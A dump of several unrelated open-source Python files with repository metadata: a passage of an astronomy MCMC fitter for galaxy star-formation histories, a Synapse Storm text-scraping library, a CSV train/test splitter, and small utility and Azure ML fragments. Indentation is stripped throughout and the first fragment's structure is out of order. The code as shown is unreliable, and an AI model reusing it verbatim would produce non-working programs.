pred_nuvu, pred_ur = lookup_col_one(theta, age)
return -0.5*N.log(2*N.pi*sigma_ur**2)-0.5*((ur-pred_ur)**2/sigma_ur**2)-0.5*N.log10(2*N.pi*sigma_nuvu**2)-0.5*((nuvu-pred_nuvu)**2/sigma_nuvu**2)
elif method == 'no' or method =='n':
"""We first define the directory in which we will find the BC03 model, extracted from the original files downloaded from the BC03 website into a usable format. Here we implement a solar metallicity model with a Chabrier IMF."""
model = str(raw_input('Location of the extracted (.ised_ASCII) SPS model to use to predict the u-r and NUV-u colours, e.g. ~/extracted_bc2003_lr_m62_chab_ssp.ised_ASCII :'))
data = N.loadtxt(model)
import fluxes
def lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
""" Function for determining the likelihood of ONE quenching model described by theta = [tq, tau] for all the galaxies in the sample. Simple chi squared likelihood between predicted and observed colours of the galaxies.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:ur:
Observed u-r colour of a galaxy; k-corrected.
:sigma_ur:
Error on the observed u-r colour of a galaxy
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected.
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
Array of same shape as :age: containing the likelihood for each galaxy at the given :theta:
"""
tq, tau = theta
pred_nuvu, pred_ur = predict_c_one(theta, age)
return -0.5*N.log(2*N.pi*sigma_ur**2)-0.5*((ur-pred_ur)**2/sigma_ur**2)-0.5*N.log10(2*N.pi*sigma_nuvu**2)-0.5*((nuvu-pred_nuvu)**2/sigma_nuvu**2)
else:
sys.exit("You didn't give a valid answer (yes/no). Try running again.")
n=0
def expsfh(tq, tau, time):
""" This function when given a single combination of [tq, tau] values will calcualte the SFR at all times. First calculate the sSFR at all times as defined by Peng et al. (2010) - then the SFR at the specified time of quenching, tq and set the SFR at this value at all times before tq. Beyond this time the SFR is an exponentially declining function with timescale tau.
INPUT:
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:time:
An array of time values at which the SFR is calcualted at each step.
RETURNS:
:sfr:
Array of the same dimensions of time containing the sfr at each timestep.
"""
ssfr = 2.5*(((10**10.27)/1E10)**(-0.1))*(time/3.5)**(-2.2)
c = time.searchsorted(3.0)
ssfr[:c] = N.interp(3.0, time, ssfr)
c_sfr = N.interp(tq, time, ssfr)*(1E10)/(1E9)
### definition is for 10^10 M_solar galaxies and per gyr - convert to M_solar/year ###
a = time.searchsorted(tq)
sfr = N.ones(len(time))*c_sfr
sfr[a:] = c_sfr*N.exp(-(time[a:]-tq)/tau)
return sfr
def expsfh_mass(ur, Mr, age, tq, tau, time):
"""Calculate exponential decline star formation rates at each time step input by matching to the mass of the observed galaxy at the observed time. This is calculated from the mass-to-light ratio that is a function of one color band u-r as in Bladry et al. (2006; see Figure 5) who fit to data from Glazebrrok et al (2004) and Kauffmann et al (2003).
INPUT:
:ur:
u-r optical colour, needed to calculate the mass of the observed galaxy
:Mr:
Absolute r-band magnitude, needed to calculate the mass of the observed galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:time:
An array of time values at which the SFR is calcualted at each step.
RETURNS:
:sfr:
Array of the same dimensions of time containing the sfr at each timestep.
"""
t_end = age # time at which to integrate under the exponential curve until to gain the final mass
if ur <=2.1:
log_m_l = -0.95 + 0.56 * ur
else:
log_m_l = -0.16 + 0.18 * ur
m_msun = 10**(((4.62 - Mr)/2.5) + log_m_l)
print 'Mass [M_solar]', m_msun
c_sfr = (m_msun/(tq + tau*(1 - N.exp((tq - t_end)/tau)))) / 1E9
a = time.searchsorted(tq)
sfr = N.ones(len(time))*c_sfr
sfr[a:] = c_sfr*N.exp(-(time[a:]-tq)/tau)
return sfr
def predict_c_one(theta, age):
""" This function predicts the u-r and nuv-u colours of a galaxy with a SFH defined by [tq, tau], according to the BC03 model at a given "age" i.e. observation time. It calculates the colours at all times then interpolates for the observed age - it has to this in order to work out the cumulative mass across the SFH to determine how much each population of stars contributes to the flux at each time step.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
:nuv_u_age:
Array the same shape as :age: with the nuv-u colour values at each given age for the specified :theta: values
:u_r_age:
Array the same shape as :age: with the u-r colour values at each given age for the specified :theta: values
"""
ti = N.arange(0, 0.01, 0.003)
t = N.linspace(0,14.0,100)
t = N.append(ti, t[1:])
tq, tau = theta
sfr = expsfh(tq, tau, t)
### Work out total flux at each time given the sfh model of tau and tq (calls fluxes function) ###
total_flux = fluxes.assign_total_flux(data[0,1:], data[1:,0], data[1:,1:], t*1E9, sfr)
### Calculate fluxes from the flux at all times then interpolate to get one colour for the age you are observing the galaxy at - if many galaxies are being observed, this also works with an array of ages to give back an array of colours ###
nuv_u, u_r = get_colours(t*1E9, total_flux, data)
nuv_u_age = N.interp(age, t, nuv_u)
u_r_age = N.interp(age, t, u_r)
return nuv_u_age, u_r_age
def get_colours(time, flux, data):
"""" Calculates the colours of a given sfh fluxes across time given the BC03 models from the magnitudes of the SED.
:time:
Array of times at which the colours should be calculated. In units of Gyrs.
:flux:
SED of fluxes describing the calcualted SFH. Returned from the assign_total_flux function in fluxes.py
:data:
BC03 model values for wavelengths, time steps and fluxes. The wavelengths are needed to calculate the magnitudes.
RETURNS:
:nuv_u: :u_r:
Arrays the same shape as :time: with the predicted nuv-u and u-r colours
"""
nuvmag = fluxes.calculate_AB_mag(time, data[1:,0], flux, nuvwave, nuvtrans)
umag = fluxes.calculate_AB_mag(time, data[1:,0], flux, uwave, utrans)
rmag = fluxes.calculate_AB_mag(time, data[1:,0], flux, rwave, rtrans)
nuv_u = nuvmag - umag
u_r = umag - rmag
return nuv_u, u_r
def lookup_col_one(theta, age):
ur_pred = u(theta[0], theta[1])
nuv_pred = v(theta[0], theta[1])
return nuv_pred, ur_pred
# Prior likelihood on theta values given the inital w values assumed for the mean and stdev
def lnprior(theta):
""" Function to calcualted the prior likelihood on theta values given the inital w values assumed for the mean and standard deviation of the tq and tau parameters. Defined ranges are specified - outside these ranges the function returns -N.inf and does not calculate the posterior probability.
:theta:
An array of size (1,4) containing the values [tq, tau] for both smooth and disc galaxies in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time. Can be either for smooth or disc galaxies.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5. Can be either for smooth or disc galaxies.
RETURNS:
Value of the prior at the specified :theta: value.
"""
tq, tau = theta
if 0.003 <= tq <= 13.807108309208775 and 0.003 <= tau <= 4.0:
return 0.0
else:
return -N.inf
# Overall likelihood function combining prior and model
def lnprob(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
"""Overall posterior function combiningin the prior and calculating the likelihood. Also prints out the progress through the code with the use of n.
:theta:
An array of size (1,4) containing the values [tq, tau] for both smooth and disc galaxies in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time. Can be either for smooth or disc galaxies.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5. Can be either for smooth or disc galaxies.
:ur:
Observed u-r colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_ur:
Error on the observed u-r colour of a galaxy. An array of shape (N,1) or (N,).
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy. An array of shape (N,1) or (N,).
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr. An array of shape (N,1) or (N,).
RETURNS:
Value of the posterior function for the given :theta: value.
"""
global n
n+=1
if n %100 == 0:
print 'step number', n/100
lp = lnprior(theta)
if not N.isfinite(lp):
return -N.inf
return lp + lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age)
def sample(ndim, nwalkers, nsteps, burnin, start, ur, sigma_ur, nuvu, sigma_nuvu, age, id, ra, dec):
""" Function to implement the emcee EnsembleSampler function for the sample of galaxies input. Burn in is run and calcualted fir the length specified before the sampler is reset and then run for the length of steps specified.
:ndim:
The number of parameters in the model that emcee must find. In this case it always 2 with tq, tau.
:nwalkers:
The number of walkers that step around the parameter space. Must be an even integer number larger than ndim.
:nsteps:
The number of steps to take in the final run of the MCMC sampler. Integer.
:burnin:
The number of steps to take in the inital burn-in run of the MCMC sampler. Integer.
:start:
The positions in the tq and tau parameter space to start for both disc and smooth parameters. An array of shape (1,4).
:ur:
Observed u-r colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_ur:
Error on the observed u-r colour of a galaxy. An array of shape (N,1) or (N,).
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy. An array of shape (N,1) or (N,).
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr. An array of shape (N,1) or (N,).
:id:
ID number to specify which galaxy this run is for.
:ra:
right ascension of source, used for identification purposes
:dec:
declination of source, used for identification purposes
RETURNS:
:samples:
Array of shape (nsteps*nwalkers, 4) containing the positions of the walkers at all steps for all 4 parameters.
:samples_save:
Location at which the :samples: array was saved to.
"""
if method == 'yes' or method=='y':
global u
global v
a = N.searchsorted(ages, age)
b = N.array([a-1, a])
print 'interpolating function, bear with...'
g = grid[N.where(N.logical_or(grid[:,0]==ages[b[0]], grid[:,0]==ages[b[1]]))]
values = lu[N.where(N.logical_or(grid[:,0]==ages[b[0]], grid[:,0]==ages[b[1]]))]
f = LinearNDInterpolator(g, values, fill_value=(-N.inf))
look = f(age, grid[:10000, 1], grid[:10000, 2])
lunuv = look[:,0].reshape(100,100)
v = interp2d(tq, tau, lunuv)
luur = look[:,1].reshape(100,100)
u = interp2d(tq, tau, luur)
else:
pass
print 'emcee running...'
p0 = [start + 1e-4*N.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, threads=2, args=(ur, sigma_ur, nuvu, sigma_nuvu, age))
""" Burn in run here..."""
pos, prob, state = sampler.run_mcmc(p0, burnin)
lnp = sampler.flatlnprobability
N.save('lnprob_burnin_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy', lnp)
samples = sampler.chain[:,:,:].reshape((-1,ndim))
samples_save = 'samples_burn_in_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy'
N.save(samples_save, samples)
sampler.reset()
print 'Burn in complete...'
""" Main sampler run here..."""
sampler.run_mcmc(pos, nsteps)
lnpr = sampler.flatlnprobability
N.save('lnprob_run_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy', lnpr)
samples = sampler.chain[:,:,:].reshape((-1,ndim))
samples_save = 'samples_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy'
N.save(samples_save, samples)
print 'Main emcee run completed.'
return samples, samples_save
#Define function to plot the walker positions as a function of the step
def walker_plot(samples, nwalkers, limit, id):
""" Plotting function to visualise the steps of the walkers in each parameter dimension for smooth and disc theta values.
:samples:
Array of shape (nsteps*nwalkers, 4) produced by the emcee EnsembleSampler in the sample function.
:nwalkers:
The number of walkers that step around the parameter space used to produce the samples by the sample function. Must be an even integer number larger than ndim.
:limit:
Integer value less than nsteps to plot the walker steps to.
:id:
ID number to specify which galaxy this plot is for.
RETURNS:
:fig:
The figure object
"""
s = samples.reshape(nwalkers, -1, 2)
s = s[:,:limit, :]
fig = P.figure(figsize=(8,5))
ax1 = P.subplot(2,1,1)
ax2 = P.subplot(2,1,2)
for n in range(len(s)):
ax1.plot(s[n,:,0], 'k')
ax2.plot(s[n,:,1], 'k')
ax1.tick_params(axis='x', labelbottom='off')
ax2.set_xlabel(r'step number')
ax1.set_ylabel(r'$t_{quench}$')
ax2.set_ylabel(r'$\tau$')
P.subplots_adjust(hspace=0.1)
save_fig = 'walkers_steps_'+str(int(id))+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.pdf'
fig.savefig(save_fig)
return fig
def corner_plot(s, labels, extents, bf, id):
""" Plotting function to visualise the gaussian peaks found by the sampler function. 2D contour plots of tq against tau are plotted along with kernelly smooth histograms for each parameter.
:s:
Array of shape (#, 2) for either the smooth or disc produced by the emcee EnsembleSampler in the sample function of length determined by the number of walkers which resulted at the specified peak.
:labels:
List of x and y axes labels i.e. disc or smooth parameters
:extents:
Range over which to plot the samples, list shape [[xmin, xmax], [ymin, ymax]]
:bf:
Best fit values for the distribution peaks in both tq and tau found from mapping the samples. List shape [(tq, poserrtq, negerrtq), (tau, poserrtau, negerrtau)]
:id:
ID number to specify which galaxy this plot is for.
RETURNS:
:fig:
The figure object
"""
x, y = s[:,0], s[:,1]
fig = P.figure(figsize=(6.25,6.25))
ax2 = P.subplot2grid((3,3), (1,0), colspan=2, rowspan=2)
ax2.set_xlabel(labels[0])
ax2.set_ylabel(labels[1])
triangle.hist2d(x, y, ax=ax2, bins=100, extent=extents, plot_contours=True)
ax2.axvline(x=bf[0][0], linewidth=1)
ax2.axhline(y=bf[1][0], linewidth=1)
[l.set_rotation(45) for l in ax2.get_xticklabels()]
[j.set_rotation(45) for j in ax2.get_yticklabels()]
ax2.tick_params(axis='x', labeltop='off')
ax1 = P.subplot2grid((3,3), (0,0),colspan=2)
den = kde.gaussian_kde(x[N.logical_and(x>=extents[0][0], x<=extents[0][1])])
pos = N.linspace(extents[0][0], extents[0][1], 750)
ax1.plot(pos, den(pos), 'k-', linewidth=1)
ax1.axvline(x=bf[0][0], linewidth=1)
ax1.axvline(x=bf[0][0]+bf[0][1], c='b', linestyle='--')
ax1.axvline(x=bf[0][0]-bf[0][2], c='b', linestyle='--')
ax1.set_xlim(extents[0][0], extents[0][1])
ax12 = ax1.twiny()
ax12.set_xlim(extents[0][0], extents[0][1])
ax12.set_xticks(N.array([1.87, 3.40, 6.03, 8.77, 10.9, 12.5]))
ax12.set_xticklabels(N.array([3.5, 2.0 , 1.0, 0.5, 0.25, 0.1]))
[l.set_rotation(45) for l in ax12.get_xticklabels()]
ax12.tick_params(axis='x', labelbottom='off')
ax12.set_xlabel(r'$z$')
ax1.tick_params(axis='x', labelbottom='off', labeltop='off')
ax1.tick_params(axis='y', labelleft='off')
ax3 = P.subplot2grid((3,3), (1,2), rowspan=2)
ax3.tick_params(axis='x', labelbottom='off')
ax3.tick_params(axis='y', labelleft='off')
den = kde.gaussian_kde(y[N.logical_and(y>=extents[1][0], y<=extents[1][1])])
pos = N.linspace(extents[1][0], extents[1][1], 750)
ax3.plot(den(pos), pos, 'k-', linewidth=1)
ax3.axhline(y=bf[1][0], linewidth=1)
ax3.axhline(y=bf[1][0]+bf[1][1], c='b', linestyle='--')
ax3.axhline(y=bf[1][0]-bf[1][2], c='b', linestyle='--')
ax3.set_ylim(extents[1][0], extents[1][1])
if os.path.exists(str(int(id))+'.jpeg') == True:
ax4 = P.subplot2grid((3,3), (0,2), rowspan=1, colspan=1)
img = mpimg.imread(str(int(id))+'.jpeg')
ax4.imshow(img)
ax4.tick_params(axis='x', labelbottom='off', labeltop='off')
ax4.tick_params(axis='y', labelleft='off', labelright='off')
P.tight_layout()
P.subplots_adjust(wspace=0.0)
P.subplots_adjust(hspace=0.0)
return fig
""" Load the magnitude bandpass filters using idl save """
filters = readsav('ugriz.sav')
fuvwave= filters.ugriz.fuvwave[0]
fuvtrans = filters.ugriz.fuvtrans[0]
nuvwave= filters.ugriz.nuvwave[0]
nuvtrans = filters.ugriz.nuvtrans[0]
uwave= filters.ugriz.uwave[0]
utrans = filters.ugriz.utrans[0]
gwave= filters.ugriz.gwave[0]
gtrans = filters.ugriz.gtrans[0]
rwave= filters.ugriz.rwave[0]
rtrans = filters.ugriz.rtrans[0]
iwave= filters.ugriz.iwave[0]
itrans = filters.ugriz.itrans[0]
zwave= filters.ugriz.zwave[0]
ztrans = filters.ugriz.ztrans[0]
vwave= filters.ugriz.vwave[0]
vtrans = filters.ugriz.vtrans[0]
jwave= filters.ugriz.jwave[0]
jtrans = filters.ugriz.jtrans[0]
hwave= filters.ugriz.hwave[0]
htrans = filters.ugriz.htrans[0]
kwave= filters.ugriz.kwave[0]
ktrans = filters.ugriz.ktrans[0]
| {
"content_hash": "e22c884bb96703493e97894ad851a4cd",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 411,
"avg_line_length": 46.38558558558559,
"alnum_prop": 0.6239123679303915,
"repo_name": "zooniverse/starpy",
"id": "090b00647e1c412e963c9b3ffaa70f92e1ae0e3b",
"size": "25744",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "posterior.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "53011"
}
],
"symlink_target": ""
} |
import asyncio
import logging
import regex
import synapse.common as s_common
import synapse.lib.scrape as s_scrape
import synapse.lib.spooled as s_spooled
import synapse.lib.stormtypes as s_stormtypes
logger = logging.getLogger(__name__)
@s_stormtypes.registry.registerLib
class LibScrape(s_stormtypes.Lib):
'''
A Storm Library for providing helpers for scraping nodes from text.
'''
_storm_locals = (
{'name': 'context', 'desc': '''
Attempt to scrape information from a blob of text, getting the context information about the values found.
Notes:
This does call the ``scrape`` Storm interface if that behavior is enabled on the Cortex.
Examples:
Scrape some text and make nodes out of it::
for ($form, $valu, $info) in $lib.scrape.context($text) {
[ ( *$form ?= $valu ) ]
}
''',
'type': {'type': 'function', '_funcname': '_methContext',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
),
'returns': {'name': 'yields', 'type': 'dict',
'desc': 'A dictionary of scraped values, rule types, and offsets scraped from the text.',
}}},
{'name': 'ndefs', 'desc': '''
Attempt to scrape node form, value tuples from a blob of text.
Examples:
Scrape some text and attempt to make nodes out of it::
for ($form, $valu) in $lib.scrape($text) {
[ ( *$form ?= $valu ) ]
}''',
'type': {'type': 'function', '_funcname': '_methNdefs',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
),
'returns': {'name': 'yields', 'type': 'list',
'desc': 'A list of (form, value) tuples scraped from the text.', }}},
{'name': 'genMatches', 'desc': '''
genMatches is a generic helper function for constructing scrape interfaces using pure Storm.
It accepts the text, a regex pattern, and produce results that can easily be used to create
Notes:
The pattern must have a named regular expression match for the key ``valu`` using the
named group syntax. For example ``(somekey\\s)(?P<valu>[a-z0-9]+)\\s``.
Examples:
A scrape implementation with a regex that matches name keys in text::
$re="(Name\\:\\s)(?P<valu>[a-z0-9]+)\\s"
$form="ps:name"
function scrape(text, form) {
$ret = $lib.list()
for ($valu, $info) in $lib.scrape.genMatches($text, $re) {
$ret.append(($form, $valu, $info))
}
return ( $ret )
}
''',
'type': {'type': 'function', '_funcname': '_methGenMatches',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
{'name': 'pattern', 'type': 'str',
'desc': 'The regular expression pattern to match against.', },
{'name': 'fangs', 'type': 'list', 'default': None,
'desc': 'A list of (src, dst) pairs to refang from text. The src must be equal or larger '
'than the dst in length.'},
{'name': 'flags', 'type': 'int', 'default': regex.IGNORECASE,
'desc': 'Regex flags to use (defaults to IGNORECASE).'},
),
'returns': {'name': 'yields', 'type': 'list',
'desc': ''}}}
)
_storm_lib_path = ('scrape', )
def getObjLocals(self):
return {
'ndefs': self._methNdefs,
'context': self._methContext,
'genMatches': self._methGenMatches,
}
async def __call__(self, text, ptype=None, refang=True, unique=True):
text = await s_stormtypes.tostr(text)
form = await s_stormtypes.tostr(ptype, noneok=True)
refang = await s_stormtypes.tobool(refang)
unique = await s_stormtypes.tobool(unique)
# Remove this in 3.0.0 since it is deprecated.
s_common.deprecated('Directly calling $lib.scrape()')
await self.runt.warnonce('$lib.scrape() is deprecated. Use $lib.scrape.ndefs().')
async with await s_spooled.Set.anit() as items: # type: s_spooled.Set
for item in s_scrape.scrape(text, ptype=form, refang=refang, first=False):
if unique:
if item in items:
continue
await items.add(item)
yield item
await asyncio.sleep(0)
@s_stormtypes.stormfunc(readonly=True)
async def _methContext(self, text):
text = await s_stormtypes.tostr(text)
genr = self.runt.snap.view.scrapeIface(text)
async for (form, valu, info) in genr:
yield (form, valu, info)
@s_stormtypes.stormfunc(readonly=True)
async def _methNdefs(self, text):
text = await s_stormtypes.tostr(text)
genr = self.runt.snap.view.scrapeIface(text, unique=True)
async for (form, valu, _) in genr:
yield (form, valu)
@s_stormtypes.stormfunc(readonly=True)
async def _methGenMatches(self, text, pattern, fangs=None, flags=regex.IGNORECASE):
text = await s_stormtypes.tostr(text)
pattern = await s_stormtypes.tostr(pattern)
fangs = await s_stormtypes.toprim(fangs)
flags = await s_stormtypes.toint(flags)
opts = {}
regx = regex.compile(pattern, flags=flags)
_fangs = None
_fangre = None
offsets = None
scrape_text = text
if fangs:
_fangs = {src: dst for (src, dst) in fangs}
_fangre = s_scrape.genFangRegex(_fangs)
scrape_text, offsets = s_scrape.refang_text2(text, re=_fangre, fangs=_fangs)
for info in s_scrape.genMatches(scrape_text, regx, opts=opts):
valu = info.pop('valu')
if _fangs and offsets:
s_scrape._rewriteRawValu(text, offsets, info)
yield valu, info
| {
"content_hash": "d88791ce5cbb8101f9ec3fca8873d6e4",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 119,
"avg_line_length": 40.263803680981596,
"alnum_prop": 0.5125704708212707,
"repo_name": "vertexproject/synapse",
"id": "86fe9e1b7917a808e5a9f1f55efe55fa2b627b25",
"size": "6563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synapse/lib/stormlib/scrape.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "4010"
},
{
"name": "HTML",
"bytes": "3"
},
{
"name": "Python",
"bytes": "5894053"
},
{
"name": "Shell",
"bytes": "10776"
}
],
"symlink_target": ""
} |
'''
Created on Oct 24, 2014
This is to split a csv dataset into fixed number of rows and then splitting that into training and testing
@author: wahib
'''
from __future__ import print_function
from sklearn import datasets
from sklearn.cross_validation import train_test_split
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn import svm
import numpy as np
import csv
import pylab as pl
from sklearn.metrics import roc_curve, auc
from sklearn import preprocessing
import pandas as pd
import random
import sys
print(__doc__)
def splitForLibsvm(folderPath, csvPath, rowExtractCount):
trainTargetArray = []
trainDataArray = []
#folderPath = '10000rows/'
#fullData = pd.read_csv('csv/1percent_of_200mels.csv', delimiter=",",skiprows=0, dtype=np.float16)
#fullData = pd.read_csv('csv/200mels.csv', delimiter=",",skiprows=0, dtype=np.float16)
fullData = pd.read_csv(csvPath, delimiter=",",skiprows=0, dtype=np.float16)
shape = fullData.shape
print('size of full data ', shape)
trainData = fullData.iloc[:,:-1] #all except last column
trainTarget = fullData.iloc[:,-1] # only last column
print('len of traindata', len(trainData))
#print('print traindata', trainData)
#only commented when full dataset needs to be used
print('count of rows to extract', rowExtractCount)
rows = random.sample(trainData.index,rowExtractCount)
trainData = trainData.ix[rows]
trainTarget = trainTarget.ix[rows]
print('target size', trainTarget.shape)
#print('target values', trainTarget)
trainData = np.array(trainData)
trainTarget = np.array(trainTarget)
trainTarget = np.squeeze(trainTarget)
#print(trainTarget)
#print(trainData)
#only commented for 200k dataset because it was nullifying all values
trainData = preprocessing.scale(trainData)
print('scaling-normalization over for trainData')
# Split the dataset in two equal parts
X_train, X_test, y_train, y_test = train_test_split(
trainData, trainTarget, test_size=0.2, random_state=123)
print('X_train : ', X_train.shape)
print('y_train : ', y_train.shape)
print('X_test : ', X_test.shape)
print('y_test : ', y_test.shape)
#with open('csv/libsvm/'+folderPath+'/Ytr.txt', 'w') as FOUT:
with open(folderPath+'/Ytr.txt', 'w') as FOUT:
np.savetxt(FOUT, y_train ,fmt='%d',delimiter=',')
with open(folderPath+'/Xtr.csv', 'w') as FOUT:
np.savetxt(FOUT, X_train, fmt='%1.5f',delimiter=',')
with open(folderPath+'/Xte.csv', 'w') as FOUT:
np.savetxt(FOUT, X_test, fmt='%1.5f',delimiter=',')
with open(folderPath+'/Yte.txt', 'w') as FOUT:
np.savetxt(FOUT, y_test, fmt='%d',delimiter=',')
print('train and test csv files created')
if __name__ == '__main__':
if len(sys.argv) < 4:
print('3 Arguments required i.e [folderPath] [csvPath] [rowExtractCount] ')
else:
folderPath = sys.argv[1]
csvPath = sys.argv[2]
rowExtractCount = sys.argv[3]
splitForLibsvm(folderPath, csvPath, rowExtractCount)
| {
"content_hash": "94238c57bbf57ff48996981873c5d814",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 106,
"avg_line_length": 29.184466019417474,
"alnum_prop": 0.7082501663339986,
"repo_name": "wahibhaq/android-speaker-audioanalysis",
"id": "3fa8b0d5d544ec66e51799e441c1ad628e683398",
"size": "3006",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/Basic/split_for_libsvm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "98"
},
{
"name": "C",
"bytes": "5311"
},
{
"name": "C++",
"bytes": "142895"
},
{
"name": "Java",
"bytes": "415228"
},
{
"name": "Makefile",
"bytes": "201515"
},
{
"name": "Matlab",
"bytes": "7068"
},
{
"name": "Python",
"bytes": "15695"
},
{
"name": "Shell",
"bytes": "238"
},
{
"name": "TeX",
"bytes": "9581"
}
],
"symlink_target": ""
} |
import os
from typet import Object
from typet import String
class EnvironmentVariable(Object):
name: String[1:]
@property
def value(self):
return os.environ.get(self.name)
| {
"content_hash": "d4a1477b4a51142559f70d5f818d12d0",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 40,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.6989795918367347,
"repo_name": "zancas/containenv",
"id": "75c937670cc1b6845e7348e88fb3ab86c2d3247c",
"size": "220",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "containment/types/environment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "39438"
},
{
"name": "Shell",
"bytes": "268"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
try:
from urllib.request import urlopen
import urllib.parse as urlparse
from urllib.parse import urlencode
except ImportError:
import urlparse
from urllib2 import urlopen
from urllib import urlencode
| {
"content_hash": "f7196fb5dd870a79774d465e064ac6d0",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 38,
"avg_line_length": 26.4,
"alnum_prop": 0.7575757575757576,
"repo_name": "kmike/imobis",
"id": "9e4a850f337696c677aec7bc0094cbb9cdc05e4a",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imobis/compat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8396"
}
],
"symlink_target": ""
} |
from typing import List, Union
from azure.ai.ml._restclient.v2022_10_01_preview.models import (
AutoForecastHorizon,
AutoSeasonality,
AutoTargetLags,
AutoTargetRollingWindowSize,
CustomForecastHorizon,
CustomSeasonality,
CustomTargetLags,
CustomTargetRollingWindowSize,
ForecastHorizonMode,
)
from azure.ai.ml._restclient.v2022_10_01_preview.models import ForecastingSettings as RestForecastingSettings
from azure.ai.ml._restclient.v2022_10_01_preview.models import (
SeasonalityMode,
TargetLagsMode,
TargetRollingWindowSizeMode,
)
from azure.ai.ml.entities._mixins import RestTranslatableMixin
class ForecastingSettings(RestTranslatableMixin):
"""Forecasting settings for an AutoML Job.
:param country_or_region_for_holidays: The country/region used to generate holiday features. These should be ISO
3166 two-letter country/region code, for example 'US' or 'GB'.
:type country_or_region_for_holidays: str
:param forecast_horizon: The desired maximum forecast horizon in units of time-series frequency.
:type forecast_horizon: int
:param target_lags: The number of past periods to lag from the target column. Use 'auto' to use the automatic
heuristic based lag.
:type target_lags: Union[str, int, List[int]]
:param target_rolling_window_size: The number of past periods used to create a rolling window average of the
target column.
:type target_rolling_window_size: int
:param frequency: Forecast frequency. When forecasting, this parameter represents the period with which the
forecast is desired, for example daily, weekly, yearly, etc.
:type frequency: str
:param feature_lags: Flag for generating lags for the numeric features with 'auto'
:type feature_lags: str
:param seasonality: Set time series seasonality as an integer multiple of the series frequency. Use 'auto' for
automatic settings.
:type seasonality: Union[str, int]
:param use_stl: Configure STL Decomposition of the time-series target column. use_stl can take two values:
'season' - only generate season component and 'season_trend' - generate both season and trend components.
:type use_stl: str
:param short_series_handling_config: The parameter defining how if AutoML should handle short time series.
